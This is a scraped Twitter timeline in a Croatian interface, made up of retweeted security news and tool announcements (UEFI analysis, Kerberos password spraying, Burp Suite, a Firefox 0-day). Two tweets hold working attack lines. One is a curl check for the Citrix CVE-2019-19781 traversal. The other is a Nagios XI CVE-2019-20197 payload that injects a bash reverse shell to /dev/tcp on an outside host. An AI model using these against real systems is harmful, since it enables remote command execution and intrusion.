Tweetovi

Blokirali ste korisnika/cu @scyphian

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @scyphian

  1. proslijedio/la je Tweet
    15. sij

    Want to play with LoRa using SDR? Or have few guidelines for you security assessment? Checkout my new post here:

    Poništi
  2. proslijedio/la je Tweet
    19. sij

    Now UEFI_RETool IDA plugin can display the sequence of execution of UEFI images and dependencies between images

    Poništi
  3. proslijedio/la je Tweet
    17. sij

    Added support for MonetDB

    Poništi
  4. proslijedio/la je Tweet

    Welcome to our CGTO students today starting our captivating specialized KESTREL course, Day 1 is always a great day!!

    Poništi
  5. proslijedio/la je Tweet
    15. sij

    Look at this table from and consider whether your search application (especially if it is proclaiming its ability to 'find people') can cope with these challenges It's not a function of which countries you work in.

    Poništi
  6. proslijedio/la je Tweet
    9. sij

    Spray-AD, a new Kerberos password spraying tool for Cobalt Strike that might come in handy when assessing Active Directory environments for weak passwords (generates event IDs 4771 instead of 4625).

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    9. sij

    Want to learn an awesome trick with Burp Suite? Watch our video tutorial Intercepting Mobile Traffic with Burp Suite! If you liked it, don't forget to share it!

    Poništi
  8. proslijedio/la je Tweet
    10. sij
    Poništi
  9. proslijedio/la je Tweet
    10. sij
    Poništi
  10. proslijedio/la je Tweet
    10. sij
    Poništi
  11. proslijedio/la je Tweet
    10. sij

    Major Brazilian Bank Tests Homomorphic Encryption on Financial Data by

    Poništi
  12. proslijedio/la je Tweet
    10. sij

    Not sure what search filters are available? Check out our new filter reference page:

    Poništi
  13. proslijedio/la je Tweet
    10. sij

    Check out our blog “How Data Annotation Works: Inside NLP and Search, Part IV”

    Poništi
  14. proslijedio/la je Tweet
    11. sij

    yesterday on How easy is it to hack an Apple ? Here’s how Google hackers compromised an iPhone within minutes.

    Poništi
  15. proslijedio/la je Tweet
    9. sij

    Operationalizing Threat Intelligence at Scale in the SOC by Sebastien Tricaud

    Poništi
  16. proslijedio/la je Tweet
    9. sij

    Heads up Critical Firefox 0-Day Under Active Attacks – Update Your Browser Now

    Poništi
  17. proslijedio/la je Tweet

    CVE-2019-19781 Citrix NetScaler Directory Traversal is on heavy 🔥 curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET” 🧙‍♂️better check your targets 😏

    Poništi
  18. proslijedio/la je Tweet
    8. sij

    CVE-2019-20197 Nagios XI远程命令执行漏洞 RCE <= v5.6.9 (需要身份认证) http://x.x.x.x/nagiosxi//includes/components/scheduledreporting/schedulereport.php Post : id=a";/bin/bash -l > /dev/tcp/x.x.x.x/8989 0<&1 2>&1;

    Poništi
  19. 8. sij
    Poništi
  20. proslijedio/la je Tweet

    New(ish) Presentation: Poking the Bear - Teasing out Apple's Secrets through Dynamic Forensic Testing and Analysis

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·